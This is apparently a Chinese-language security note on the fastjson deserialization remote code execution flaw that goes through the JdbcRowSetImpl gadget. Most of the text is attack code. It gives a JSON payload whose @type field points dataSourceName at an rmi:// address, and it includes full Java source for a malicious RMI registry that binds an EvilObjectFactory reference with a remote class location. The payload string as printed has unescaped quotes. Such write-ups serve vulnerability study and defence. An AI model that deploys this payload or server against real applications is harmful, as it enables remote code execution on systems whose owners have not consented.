fastjson反序列化JdbcRowSetImpl

Gadget com.sun.rowset.JdbcRowSetImpl

 setAutoCommit() -> connect() -> InitialContext.lookup()

poc如下，dataSourceName 为rmi://localhost:1090/evil:

String payload = "{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","
                + ""dataSourceName":"" + dataSourceName + "","
                + ""autoCommit":"true"}";

RMIServer代码如下：

package org.lain.poc.jndi;
import com.sun.jndi.rmi.registry.ReferenceWrapper;

import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

/**
 * @author: lanqihe
 * @Date: 下午8:01 2017/12/11
 * @Modified By:
 * @Description: 本地注册一个register，并将恶意的类绑定
 */
public class RMIServer {


    public static void main(String argv[]) {

        try {
            Registry  registry =  LocateRegistry.createRegistry(1090);

            //如果通过rmi无法找到org.lain.poc.jndi.EvilObjectFactory，则尝试从factoryLocation 获取
            //因此，本地测试的话，如果factory正确，factoryLocation随便填写
            Reference reference = new Reference("EvilObject","org.lain.poc.jndi.EvilObjectFactory","http://localhost:9999/" );


            //客户端通过evil查找，获取到EvilObject
            registry.bind("evil",new ReferenceWrapper(reference));

            System.out.println("Ready!");
            System.out.println("Waiting for connection......");

        } catch (Exception e) {
            System.out.println("RMIServer: " + e.getMessage());
            e.printStackTrace();
        }
    }
}

调试过程如下：
加载com.sun.rowset.JdbcRowSetImpl类

总结：fastjson @type的值传入类，在解析json时，就会调用传入属性的getter,setter方法。如果找到一个类getter,setter能够传入可控的恶意class字节码或者是jdni服务，就能导致rce.

参考链接：
http://xxlegend.com/2017/12/06/%E5%9F%BA%E4%BA%8EJdbcRowSetImpl%E7%9A%84Fastjson%20RCE%20PoC%E6%9E%84%E9%80%A0%E4%B8%8E%E5%88%86%E6%9E%90/